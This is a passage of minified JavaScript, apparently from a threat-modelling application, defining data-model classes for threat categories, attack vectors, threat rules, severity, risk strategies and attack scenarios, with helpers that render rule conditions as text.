so.Compliance:return"impactcategory.Compliance";case so.Financial:return"impactcategory.Financial";case so.Reputation:return"impactcategory.Reputation";case so.CustomerSatisfaction:return"impactcategory.CustomerSatisfaction";case so.ProductionProcess:return"impactcategory.ProductionProcess";default:return console.error("Missing Cat in ImpactCategoryUtil.ToString()",a),"Undefined"}}}class Jb extends Ln{get ImpactCats(){return this.Data.ImpactCats}constructor(a,e){super(a),this.ImpactCats||(this.Data.ImpactCats=[])}FindReferences(a,e){let i=[];return e.GetAttackVectors().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromAttackVector,Param:n})}),e.GetThreatRules().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromThreatRule,Param:n})}),e.GetStencilThreatMnemonics().filter(n=>n.Letters.some(r=>r.threatCategoryID==this.ID)).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromThreatMnemonic,Param:n})}),null==a||a.GetAttackScenarios().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatCategory(this);n&&n.RemoveThreatCategory(this),i.forEach(r=>{if(r.Type==li.RemoveThreatCategoryFromAttackScenario){let c=r.Param.Mapping.Threat.ThreatCategoryIDs;c.splice(c.indexOf(r.Param.ID),1)}else if(r.Type==li.RemoveThreatCategoryFromAttackVector){let c=r.Param.Data.threatCategorieIDs;c.splice(c.indexOf(r.Param.ID),1)}else if(r.Type==li.RemoveThreatCategoryFromThreatRule){let c=r.Param.Mapping.ThreatCategoryIDs;c.splice(c.indexOf(r.Param.ID),1)}else r.Type==li.RemoveThreatCategoryFromThreatMnemonic&&r.Param.Letters.forEach(c=>{c.threatCategoryID==this.ID&&(c.threatCategoryID=null)})})}static FromJSON(a,e){return new Jb(a,e)}}class Zb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.threatCategorieIDs||(this.Data.threatCategorieIDs=[])}get ThreatCategories(){let a=[];return this.Data.threatCategorieIDs.forEach(e=>a.push(this.config.GetThreatCategory(e))),a}AddThreatCategory(a){this.ThreatCategories.includes(a)||this.Data.threatCategorieIDs.push(a.ID)}RemoveThreatCategory(a){this.ThreatCategories.includes(a)&&this.Data.threatCategorieIDs.splice(this.Data.threatCategorieIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.ThreatCategories.forEach(n=>i.push({Type:li.DeleteThreatCategory,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteThreatCategory&&e.DeleteThreatCategory(n.Param)})}static FromJSON(a,e){return new Zb(a,e)}}var lr=(()=>{return(t=lr||(lr={})).Concept="C",t.Implementation="I",t.Production="P",t.Distribution="D",t.Setup="S",t.Operation="O",t.Update="U",t.Maintenance="M",t.EndOfLife="E",lr;var t})();class y2{static GetKeys(){return[lr.Concept,lr.Implementation,lr.Production,lr.Distribution,lr.Setup,lr.Operation,lr.Update,lr.Maintenance,lr.EndOfLife]}static GetMitigationKeys(){return[lr.Concept,lr.Implementation,lr.Production,lr.Operation,lr.Update,lr.Maintenance]}static ToString(a){switch(a){case lr.Concept:return"lifecycle.Concept";case lr.Implementation:return"lifecycle.Implementation";case lr.Production:return"lifecycle.Production";case lr.Distribution:return"lifecycle.Distribution";case lr.Setup:return"lifecycle.Setup";case lr.Operation:return"lifecycle.Operation";case lr.Update:return"lifecycle.Update";case lr.Maintenance:return"lifecycle.Maintenance";case lr.EndOfLife:return"lifecycle.EndOfLife";default:return console.error("Missing Life Cycle in LifeCycleUtil.ToString()"),"Undefined"}}}var Nm=(()=>{return(t=Nm||(Nm={}))[t.Weakness=1]="Weakness",t[t.AttackTechnique=2]="AttackTechnique",Nm;var t})();class eM{static GetTypes(){return[Nm.Weakness,Nm.AttackTechnique]}static GetTypeNames(){let a=[];return eM.GetTypes().forEach(e=>a.push(eM.ToString(e))),a}static ToString(a){switch(a){case Nm.Weakness:return"general.Weakness";case Nm.AttackTechnique:return"general.AttackTechnique";default:return console.error("Missing Option Type in AttackVectorTypes.ToString()"),"Undefined"}}}var cn=(()=>{return(t=cn||(cn={}))[t.None=0]="None",t[t.Low=1]="Low",t[t.Medium=2]="Medium",t[t.High=3]="High",t[t.Critical=4]="Critical",cn;var t})();class vn{static GetTypes(){return[cn.None,cn.Low,cn.Medium,cn.High,cn.Critical]}static GetTypesDashboard(){return[cn.Low,cn.Medium,cn.High,cn.Critical]}static ToString(a){switch(a){case cn.None:return"properties.threatseverity.None";case cn.Low:return"properties.threatseverity.Low";case cn.Medium:return"properties.threatseverity.Medium";case cn.High:return"properties.threatseverity.High";case cn.Critical:return"properties.threatseverity.Critical"}}}class zp extends Ln{constructor(a,e){super(a),this.config=e,this.OriginTypes||(this.OriginTypes=[]),this.ThreatIntroduced||(this.Data.ThreatIntroduced=[]),this.ThreatExploited||(this.Data.ThreatExploited=[]),this.Data.threatCategorieIDs||(this.Data.threatCategorieIDs=[]),this.AttackTechnique&&!this.AttackTechnique.CVSS&&(this.AttackTechnique.CVSS={})}get ThreatIntroduced(){return this.Data.ThreatIntroduced}get ThreatExploited(){return this.Data.ThreatExploited}get Adversaries(){return this.Data.Adversaries}set Adversaries(a){this.Data.Adversaries=a}get OriginTypes(){return this.Data.OriginTypes}set OriginTypes(a){this.Data.OriginTypes=a,a.includes(Nm.Weakness)&&!this.Weakness&&(this.Weakness={}),a.includes(Nm.AttackTechnique)&&!this.AttackTechnique&&(this.AttackTechnique={CVSS:{}})}get ThreatCategories(){let a=[];return this.Data.threatCategorieIDs.forEach(e=>a.push(this.config.GetThreatCategory(e))),a}set ThreatCategories(a){this.Data.threatCategorieIDs=null==a?void 0:a.map(e=>e.ID)}get Weakness(){return this.Data.Weakness}set Weakness(a){this.Data.Weakness=a}get AttackTechnique(){return this.Data.AttackTechnique}set AttackTechnique(a){this.Data.AttackTechnique=a}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=a}FindReferences(a,e){let i=[];return e.GetThreatRules().filter(n=>{var r;return(null===(r=n.AttackVector)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteThreatRule,Param:n})}),e.GetControls().filter(n=>n.MitigatedAttackVectors.some(r=>r.ID==this.ID)).forEach(n=>{i.push({Type:li.RemoveAttackVectorFromControl,Param:n})}),null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.AttackVector)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfAttackVector(this);n&&n.RemoveAttackVector(this),i.forEach(r=>{r.Type==li.DeleteThreatRule?e.DeleteThreatRule(r.Param):r.Type==li.RemoveAttackVectorFromControl?r.Param.MitigatedAttackVectors=r.Param.MitigatedAttackVectors.filter(c=>c.ID!=this.ID):r.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(r.Param)})}static FromJSON(a,e){return new zp(a,e)}}class tM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.attackVectorGroupIDs||(this.Data.attackVectorGroupIDs=[]),this.Data.attackVectorIDs||(this.Data.attackVectorIDs=[])}get SubGroups(){let a=[];return this.Data.attackVectorGroupIDs.forEach(e=>a.push(this.config.GetAttackVectorGroup(e))),a}get AttackVectors(){let a=[];return this.Data.attackVectorIDs.forEach(e=>a.push(this.config.GetAttackVector(e))),a}AddAttackVectorGroup(a){this.SubGroups.includes(a)||this.Data.attackVectorGroupIDs.push(a.ID)}RemoveAttackVectorGroup(a){this.SubGroups.includes(a)&&this.Data.attackVectorGroupIDs.splice(this.Data.attackVectorGroupIDs.indexOf(a.ID),1)}AddAttackVector(a){this.AttackVectors.includes(a)||this.Data.attackVectorIDs.push(a.ID)}RemoveAttackVector(a){this.AttackVectors.includes(a)&&this.Data.attackVectorIDs.splice(this.Data.attackVectorIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteAttackVectorGroup,Param:n})),this.AttackVectors.forEach(n=>i.push({Type:li.DeleteAttackVector,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfAttackVectorGroup(this);n&&n.RemoveAttackVectorGroup(this),i.forEach(r=>{r.Type==li.DeleteAttackVector?e.DeleteAttackVector(r.Param):r.Type==li.DeleteAttackVectorGroup&&e.DeleteAttackVectorGroup(r.Param)})}static FromJSON(a,e){return new tM(a,e)}}var Wp=(()=>{return(t=Wp||(Wp={}))[t.YesNo=1]="YesNo",Wp;var t})();class Pl{static GetOptions(a){return a===Wp.YesNo?[{Key:"general.Yes",Value:!0},{Key:"general.No",Value:!1},{Key:"general.N/A",Value:"undefined"}]:(console.error("Missing Option Type in OptionTypeUtil.GetOptions()",a),null)}static GetTypes(){return[Wp.YesNo]}static GetTypeNames(){let a=[];return Pl.GetTypes().forEach(e=>a.push(Pl.ToString(e))),a}static ToString(a){return a===Wp.YesNo?"optiontype.yesno":(console.error("Missing Option Type in OptionTypeUtil.ToString()"),"Undefined")}}class iM extends Ln{constructor(a,e){super(a),this.config=e,this.ChangesPerOption||(this.Data.ChangesPerOption={}),this.OptionType||(this.OptionType=Wp.YesNo)}get Question(){return this.Data.Question}set Question(a){this.Data.Question=a}get ComponentType(){return this.config.GetMyComponentType(this.Data.componentTypeID)}set ComponentType(a){this.Data.componentTypeID=a.ID}get OptionType(){return this.Data.OptionType}set OptionType(a){this.Data.OptionType=a}get Property(){return this.ComponentType.Properties.find(a=>a.ID==this.Data.propertyID)}set Property(a){this.Data.propertyID=null==a?void 0:a.ID,a&&this.OptionType==Wp.YesNo&&Pl.GetOptions(this.OptionType).forEach(e=>{this.ChangesPerOption[e.Key]={},this.ChangesPerOption[e.Key].Active=null!=e.Value,this.ChangesPerOption[e.Key].Value=e.Value})}get ChangesPerOption(){return this.Data.ChangesPerOption}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatQuestion)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),null==a||a.GetComponents().filter(n=>Object.keys(n.ThreatQuestions).includes(this.ID)).forEach(n=>{i.push({Type:li.RemoveThreatQuestionFromComponent,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario?a.DeleteAttackScenario(n.Param):n.Type==li.RemoveThreatQuestionFromComponent&&n.Param.RemoveThreatQuestion(this)})}static FromJSON(a,e){return new iM(a,e)}}var on=(()=>{return(t=on||(on={}))[t.Stencil=1]="Stencil",t[t.DFD=2]="DFD",t[t.Component=3]="Component",t[t.Protocol=4]="Protocol",on;var t})(),nl=(()=>{return(t=nl||(nl={}))[t.EachElement=1]="EachElement",t[t.OnceForAllElements=2]="OnceForAllElements",t[t.OnceForEachElement=3]="OnceForEachElement",nl;var t})();class vG{static GetTypes(){return[nl.EachElement,nl.OnceForAllElements,nl.OnceForEachElement]}static ToString(a){switch(a){case nl.EachElement:return"properties.eachElement";case nl.OnceForAllElements:return"properties.onceForAllElements";case nl.OnceForEachElement:return"properties.onceForEachElement";default:return console.error("Missing Rule Generation Type in RuleGenerationTypes.ToString()"),"Undefined"}}}var ya=(()=>{return(t=ya||(ya={}))[t.Property=1]="Property",t[t.DataFlowCrosses=2]="DataFlowCrosses",t[t.PhysicalElement=3]="PhysicalElement",t[t.SenderInterface=10]="SenderInterface",t[t.ReceiverInterface=11]="ReceiverInterface",ya;var t})(),cc=(()=>{return(t=cc||(cc={})).Equals="==",t.EqualsNot="!=",t.GreaterThan=">",t.LessThan="<",t.GreaterThanOrEquals=">=",t.LessThanOrEquals="<=",cc;var t})();class Fg{static ToString(a,e,i){return a.RuleType==on.DFD?Fg.DFDToString(a.DFDRestriction,e,i):a.RuleType==on.Stencil?Fg.StencilToString(a.StencilRestriction,e,i):a.RuleType==on.Component?Fg.ComponentToString(a.ComponentRestriction,e,i):a.RuleType==on.Protocol?Fg.ProtocolToString(a.ProtocolRestriction,e,i):void 0}static StencilToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetStencilType(a.stencilTypeID),T=0;for(let k=0;k<a.DetailRestrictions.length;k++){let q=a.DetailRestrictions[k],Y=q.Layer>T;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layer<T;)n+=")",T--;if(Y||0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND "),n+=r(d.Name),q.RestType==ya.Property){let te=e.Config.GetAllStencilProperties(d).find(pe=>pe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}else if(q.RestType==ya.DataFlowCrosses)n+=" crosses "+r(q.DataflowRest.TrustAreaIDs.map(te=>e.Config.GetStencilType(te)).map(te=>te.Name).join(" "+i.instant("general.or")+" "));else if(q.RestType==ya.PhysicalElement){let te=Sc.GetPhyiscalID(d.ElementTypeID),Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==te).Properties.find(Fe=>Fe.ID==q.PhyElementRest.Property.ID);n+="."+r(i.instant("properties.PhysicalElement"))+"."+r(Re&&Re.DisplayName?Re.DisplayName:q.PhyElementRest.Property.ID),n+=c(q.PhyElementRest.Property.ComparisonType.toString()),n+=r(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PhyElementRest.Property.Value)):String(q.PhyElementRest.Property.Value))}}for(;T>0;)n+=")",T--;return n}static ComponentToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetMyComponentType(a.componentTypeID),T=0;for(let k=0;k<a.DetailRestrictions.length;k++){let q=a.DetailRestrictions[k],Y=q.Layer>T;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layer<T;)n+=")",T--;if(Y||0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND "),n+=r(d.Name),q.RestType==ya.Property){let te=d.Properties.find(pe=>pe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}}for(;T>0;)n+=")",T--;return n}static ProtocolToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetProtocol(a.protocolID),T=0;for(let k=0;k<a.DetailRestrictions.length;k++){let q=a.DetailRestrictions[k],Y=q.Layer>T;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layer<T;)n+=")",T--;if(Y||0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND "),n+=r(d.Name),q.RestType==ya.Property){let te=d.Properties.find(pe=>pe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}}for(;T>0;)n+=")",T--;return n}static DFDToString(a,e,i){var n,r;let c="";const d=Y=>"{"+Y+"}",T=Y=>" "+Y+" ",k=(Y,te)=>-1==Y?"Data Flow":0==Y?i.instant("properties.Sender"):Y==te-1?i.instant("properties.Receiver"):"Node"+(Y-1).toString();let q=0;for(let Y=0;Y<a.NodeRestrictions.length;Y++){let te=a.NodeRestrictions[Y],pe=te.Layer>q;for(pe&&0!=Y&&(c+=a.NodeRestrictions[Y-1].IsOR?" OR ":" AND ");te.Layer>q;)c+="(",q++;for(;te.Layer<q;)c+=")",q--;if(pe||0!=Y&&(c+=a.NodeRestrictions[Y-1].IsOR?" OR ":" AND "),c+=d(k(te.NodeNumber,a.NodeTypes.length)),te.RestType==ya.Property){let Re=null;-1==te.NodeNumber?Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==Et.DataFlow).Properties.find(Fe=>Fe.ID==te.PropertyRest.ID):null===(n=a.NodeTypes[te.NodeNumber])||void 0===n||n.TypeIDs.forEach(Fe=>{Re||(Re=e.Config.GetStencilType(Fe).Properties.find(Ne=>Ne.ID==te.PropertyRest.ID))}),c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.PropertyRest.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.PropertyRest.Value)):String(te.PropertyRest.Value))}else if(te.RestType==ya.DataFlowCrosses)c+=" crosses "+d(te.DataflowRest.TrustAreaIDs.map(Re=>e.Config.GetStencilType(Re)).map(Re=>Re.Name).join(" "+i.instant("general.or")+" "));else if(te.RestType==ya.PhysicalElement){let Re=null;null===(r=a.NodeTypes[te.NodeNumber])||void 0===r||r.TypeIDs.forEach(Fe=>{if(!Re){let Ne=Sc.GetPhyiscalID(e.Config.GetStencilType(Fe).ElementTypeID);Ne&&(Re=e.Config.GetStencilTypes().find(ut=>ut.IsDefault&&ut.ElementTypeID==Ne).Properties.find(ut=>ut.ID==te.PhyElementRest.Property.ID))}}),c+="."+d(i.instant("properties.PhysicalElement"))+"."+d(te.PhyElementRest.Property.ID),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.PhyElementRest.Property.Value)):String(te.PhyElementRest.Property.Value))}else if(te.RestType==ya.SenderInterface){c+="."+d(i.instant("properties.SenderInterface"));const Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==Et.Interface).Properties.find(Fe=>Fe.ID==te.SenderInterfaceRestriction.Property.ID);c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.SenderInterfaceRestriction.Property.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.SenderInterfaceRestriction.Property.Value)):String(te.SenderInterfaceRestriction.Property.Value))}else if(te.RestType==ya.ReceiverInterface){c+="."+d(i.instant("properties.ReceiverInterface"));const Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==Et.Interface).Properties.find(Fe=>Fe.ID==te.ReceiverInterfaceRestriction.Property.ID);c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.ReceiverInterfaceRestriction.Property.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.ReceiverInterfaceRestriction.Property.Value)):String(te.ReceiverInterfaceRestriction.Property.Value))}}for(;q>0;)c+=")",q--;return c}}class Fp extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.IsActive&&(this.Data.IsActive=!0),null==this.Data.RuleGenerationType&&(this.Data.RuleGenerationType=nl.EachElement),this.Data.Mapping||(this.Data.Mapping={}),this.Data.overridenRuleIDs||(this.Data.overridenRuleIDs=[])}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get RuleType(){return this.Data.RuleType}set RuleType(a){this.Data.RuleType=a,a==on.Stencil?this.StencilRestriction||(this.StencilRestriction={stencilTypeID:"",DetailRestrictions:[]}):a==on.Component?this.ComponentRestriction||(this.ComponentRestriction={componentTypeID:"",DetailRestrictions:[]}):a==on.DFD?this.Data.DFDRestriction||(this.Data.DFDRestriction={AppliesReverse:!1,Target:-1,NodeTypes:[{TypeIDs:[]},{TypeIDs:[]}],NodeRestrictions:[]}):a!=on.Protocol||this.ProtocolRestriction||(this.ProtocolRestriction={protocolID:"",DetailRestrictions:[]})}get RuleGenerationType(){return this.Data.RuleGenerationType}set RuleGenerationType(a){this.Data.RuleGenerationType=a}get Mapping(){return this.Data.Mapping}set Mapping(a){this.Data.Mapping=a}get AttackVector(){return this.config.GetAttackVector(this.Mapping.AttackVectorID)}set AttackVector(a){this.Mapping.AttackVectorID=null==a?void 0:a.ID,a&&(this.Severity=a.Severity)}get ThreatCategories(){return this.config.GetThreatCategories().filter(a=>{var e;return null===(e=this.Mapping.ThreatCategoryIDs)||void 0===e?void 0:e.includes(a.ID)})}set ThreatCategories(a){this.Mapping.ThreatCategoryIDs=null==a?void 0:a.map(e=>e.ID)}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=a}get StencilRestriction(){return this.Data.StencilRestriction}set StencilRestriction(a){this.Data.StencilRestriction=a}get DFDRestriction(){return this.Data.DFDRestriction}set DFDRestriction(a){this.Data.DFDRestriction=a}get ComponentRestriction(){return this.Data.ComponentRestriction}set ComponentRestriction(a){this.Data.ComponentRestriction=a}get ProtocolRestriction(){return this.Data.ProtocolRestriction}set ProtocolRestriction(a){this.Data.ProtocolRestriction=a}get OverridenRules(){let a=[];return this.Data.overridenRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}set OverridenRules(a){this.Data.overridenRuleIDs=null==a?void 0:a.map(e=>e.ID)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatRule)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatRule(this);n&&n.RemoveThreatRule(this),i.forEach(r=>{r.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(r.Param)})}static FromJSON(a,e){return new Fp(a,e)}}class aM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.threatRuleGroupIDs||(this.Data.threatRuleGroupIDs=[]),this.Data.threatRuleIDs||(this.Data.threatRuleIDs=[])}get SubGroups(){let a=[];return this.Data.threatRuleGroupIDs.forEach(e=>a.push(this.config.GetThreatRuleGroup(e))),a}get ThreatRules(){let a=[];return this.Data.threatRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}get RuleType(){return this.Data.RuleType}set RuleType(a){}AddThreatRuleGroup(a){this.SubGroups.includes(a)||this.Data.threatRuleGroupIDs.push(a.ID)}RemoveThreatRuleGroup(a){this.SubGroups.includes(a)&&this.Data.threatRuleGroupIDs.splice(this.Data.threatRuleGroupIDs.indexOf(a.ID),1)}AddThreatRule(a){this.ThreatRules.includes(a)||this.Data.threatRuleIDs.push(a.ID)}RemoveThreatRule(a){this.ThreatRules.includes(a)&&this.Data.threatRuleIDs.splice(this.Data.threatRuleIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteThreatRuleGroup,Param:n})),this.ThreatRules.forEach(n=>i.push({Type:li.DeleteThreatRule,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatRuleGroup(this);n&&n.RemoveThreatRuleGroup(this),i.forEach(r=>{r.Type==li.DeleteThreatRule?e.DeleteThreatRule(r.Param):r.Type==li.DeleteThreatRuleGroup&&e.DeleteThreatRuleGroup(r.Param)})}static FromJSON(a,e){return new aM(a,e)}}var zn=(()=>{return(t=zn||(zn={}))[t.New=1]="New",t[t.Stable=2]="Stable",t[t.Removed=3]="Removed",zn;var t})(),_o=(()=>{return(t=_o||(_o={}))[t.NotSet=1]="NotSet",t[t.NotApplicable=2]="NotApplicable",t[t.NeedsInvestigation=3]="NeedsInvestigation",t[t.Verified=4]="Verified",t[t.Proven=5]="Proven",t[t.Duplicate=6]="Duplicate",_o;var t})();class ku{static GetThreatStates(){return[_o.NotSet,_o.NotApplicable,_o.NeedsInvestigation,_o.Verified,_o.Proven,_o.Duplicate]}static ToString(a){switch(a){case _o.NotSet:return"properties.threatstate.NotSet";case _o.NotApplicable:return"properties.threatstate.NotApplicable";case _o.NeedsInvestigation:return"properties.threatstate.NeedsInvestigation";case _o.Verified:return"properties.threatstate.Verified";case _o.Proven:return"properties.threatstate.Proven";case _o.Duplicate:return"properties.threatstate.Duplicate";default:return console.error("Missing State in ThreatStateUtil.ToString()",a),"Undefined"}}}var Lm=(()=>{return(t=Lm||(Lm={}))[t.Avoid=1]="Avoid",t[t.Mitigate=2]="Mitigate",t[t.Transfer=3]="Transfer",t[t.Accept=4]="Accept",Lm;var t})();class fT{static GetKeys(){return[Lm.Avoid,Lm.Mitigate,Lm.Transfer,Lm.Accept]}static ToString(a){switch(a){case Lm.Avoid:return"properties.riskstrategy.Avoid";case Lm.Mitigate:return"properties.riskstrategy.Mitigate";case Lm.Transfer:return"properties.riskstrategy.Transfer";case Lm.Accept:return"properties.riskstrategy.Accept";default:return console.error("Missing State in RiskStrategyUtil.ToString()",a),"Undefined"}}}class Rc extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.Mapping||(this.Data.Mapping={}),this.Data.targetIDs||(this.Data.targetIDs=[]),this.Data.ThreatState||(this.ThreatState=_o.NotSet),this.Data.systemThreatIDs||(this.Data.systemThreatIDs=[]),this.Data.threatActorIDs||(this.Data.threatActorIDs=[]),this.Data.linkedScenarioIDs||(this.Data.linkedScenarioIDs=[]),this.Data.myTagIDs||(this.Data.myTagIDs=[])}get Name(){if(null!=this.Data.Name)return this.Data.Name;let a="";return this.ThreatRule?a+=this.ThreatRule.Name+" on ":this.AttackVector&&(a+=this.AttackVector.GetProperty("Name")+" on "),this.Target?a+=this.Target.GetProperty("Name"):this.Targets&&(a+=this.Targets.map(e=>e.GetProperty("Name")).join(", ")),a}set Name(a){this.Data.Name=a,this.NameChanged.emit(this.Name)}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get ViewID(){return this.Data.ViewID}set ViewID(a){this.Data.ViewID=a}get MappingState(){return this.Data.MappingState}set MappingState(a){this.Data.MappingState=a}get ThreatState(){return this.Data.ThreatState}set ThreatState(a){this.Data.ThreatState=Number(a),[_o.NotApplicable,_o.Duplicate].includes(Number(a))&&this.GetCountermeasures().forEach(e=>{(1==e.AttackScenarios.length||e.AttackScenarios.every(i=>[_o.NotApplicable,_o.Duplicate].includes(i.ThreatState)||i==this))&&(e.MitigationState=Number(a)==_o.Duplicate?Ra.Duplicate:Ra.NotApplicable)})}get IsGenerated(){return this.Data.IsGenerated}set IsGenerated(a){this.Data.IsGenerated=a}get ScoreCVSS(){return this.Data.ScoreCVSS}set ScoreCVSS(a){this.Data.ScoreCVSS=a}get ScoreOwaspRR(){return this.Data.ScoreOwaspRR}set ScoreOwaspRR(a){this.Data.ScoreOwaspRR=a}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=+a}get SeverityReason(){return this.Data.SeverityReason}set SeverityReason(a){this.Data.SeverityReason=a}get Likelihood(){return this.Data.Likelihood}set Likelihood(a){this.Data.Likelihood=+a}get LikelihoodReason(){return this.Data.LikelihoodReason}set LikelihoodReason(a){this.Data.LikelihoodReason=a}get Risk(){return this.Data.Risk}set Risk(a){this.Data.Risk=+a}get RiskReason(){return this.Data.RiskReason}set RiskReason(a){this.Data.RiskReason=a}get RiskStrategy(){return this.Data.RiskStrategy}set RiskStrategy(a){this.Data.RiskStrategy=+a}get RiskStrategyReason(){return this.Data.RiskStrategyReason}set RiskStrategyReason(a){this.Data.RiskStrategyReason=a}get Target(){let a=this.project.GetDFDElement(this.Data.targetID);return a||(a=this.project.GetComponent(this.Data.targetID)),a||(a=this.project.GetContextElement(this.Data.targetID)),a}set Target(a){this.Data.targetID=null==a?void 0:a.ID}get Targets(){let a=[];return this.Data.targetIDs.forEach(e=>{let i=this.project.GetDFDElement(e);if(i)a.push(i);else{let n=this.project.GetComponent(e);if(n)a.push(n);else{let r=this.project.GetContextElement(e);r&&a.push(r)}}}),a}set Targets(a){this.Data.targetIDs=a.map(e=>e.ID)}get Mapping(){return this.Data.Mapping}set Mapping(a){this.Data.Mapping=a}get AttackVector(){var a;return this.config.GetAttackVector(null===(a=this.Mapping.Threat)||void 0===a?void 0:a.AttackVectorID)}set AttackVector(a){this.Mapping.Threat.AttackVectorID=null==a?void 0:a.ID,a&&(this.ThreatCategories=a.ThreatCategories)}get ThreatCategories(){return this.config.GetThreatCategories().filter(a=>{var e;return null===(e=this.Mapping.Threat.ThreatCategoryIDs)||void 0===e?void 0:e.includes(a.ID)})}set ThreatCategories(a){this.Mapping.Threat.ThreatCategoryIDs=a.map(e=>e.ID)}get ThreatQuestion(){return this.config.GetThreatQuestion(this.Mapping.QuestionID)}set ThreatQuestion(a){this.Mapping.QuestionID=a.ID}get ThreatRule(){return this.config.GetThreatRule(this.Mapping.RuleID)}set ThreatRule(a){this.Mapping.RuleID=a.ID}get ThreatMnemonicLetterID(){return this.Mapping.MnemonicID}set ThreatMnemonicLetterID(a){this.Mapping.MnemonicID=a}get CveEntry(){return this.Mapping.CVE}set CveEntry(a){this.Mapping.CVE=a}get RuleStillApplies(){return this.Data.RuleStillApplies}set RuleStillApplies(a){this.Data.RuleStillApplies=a}get SystemThreats(){let a=[];return this.Data.systemThreatIDs.forEach(e=>a.push(this.project.GetSystemThreat(e))),a}set SystemThreats(a){this.Data.systemThreatIDs=null==a?void 